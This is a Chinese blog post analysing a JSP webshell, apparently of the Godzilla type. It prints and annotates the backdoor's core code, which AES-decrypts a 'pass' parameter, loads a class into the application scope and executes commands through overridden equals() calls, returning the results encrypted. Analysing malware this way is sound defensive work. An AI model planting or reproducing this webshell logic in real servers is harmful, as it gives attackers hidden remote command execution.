jsp payload解析

try {

byte\[\] data = base64Decode(request.getParameter(pass)); #HTTP请求中的参数 pass

data = x(data, false); #AES解密

if (application.getAttribute("GOx2") == null) { #GOx2是Webshell 代码动态设置的,用于存储特定的数据或对象

application.setAttribute("GOx2", new X(this.getClass().getClassLoader()).Q(data)); #从字节数组 data 中加载一个类,存储在 "GOx2" 的属性中。应该是对equals的重写

} else {

java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream(); #动态存储输出流

Object f = ((Class) application.getAttribute("GOx2")).newInstance(); #把第一次请求的GOx2存储的类,赋值给对象f

f.equals(request); #执行恶意请求

f.equals(arrOut); #在equals方法中,恶意代码会检查obj是否是ByteArrayOutputStream实例。如果是,它可能会执行写入数据

f.equals(data);

response.getWriter().write(md5.substring(0, 16)); #先传入 request 可能是为了准备一些数据或环境,然后传入 arrOut 进行某些输出操作,最后传入 data 执行最终的恶意代码。

f.toString();

response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); #加密回显

response.getWriter().write(md5.substring(16)); #混淆与隐藏

}

} catch(Exception e) {}

是一个后门或Webshell,AES加密保护,使用预定义的密钥 xc 进行解密

先获取HTTP请求中的参数 pass,然后AES解密

第一次请求,pass解密之后是对equals的重写,因为GOx2为空,就存储在 "GOx2" 的属性中,方便后面调用

第二次请求才是真正的命令执行,因为GOx2已经有值,所以执行else,先调用GOx2中重写的equals给f进行命令执行

为什么是三次

f.equals(request);requst可能有除了pass其他恶意命令,准备一些数据或环境或者可能和pass(传入data)的内容进行拼接使用

f.equals(request);、f.equals(data);可以是联合共同执行命令

f.equals(arrOut);传出恶意代码,会检查obj是否是ByteArrayOutputStream实例。如果是,它可能会执行写入数据

最后response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); 加密回显

相关推荐
零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
憧憬成为web高手15 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub15 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
爱网络爱Linux15 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc15 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing15 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
Chengbei1115 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
X7x515 天前
深度拆解网络安全“闭环”之王——APPDRR模型
网络安全·网络攻击模型·安全威胁分析·安全架构·appdrr模型
Inhand陈工15 天前
污水泵站PLC数据上云实战:西门子PLC + 映翰通IG502 + DM平台全流程
人工智能·物联网·网络安全·阿里云·信息与通信·iot
X7x515 天前
一文讲透PADIMEE模型
网络安全·网络攻击模型·安全威胁分析·安全架构·padimee模型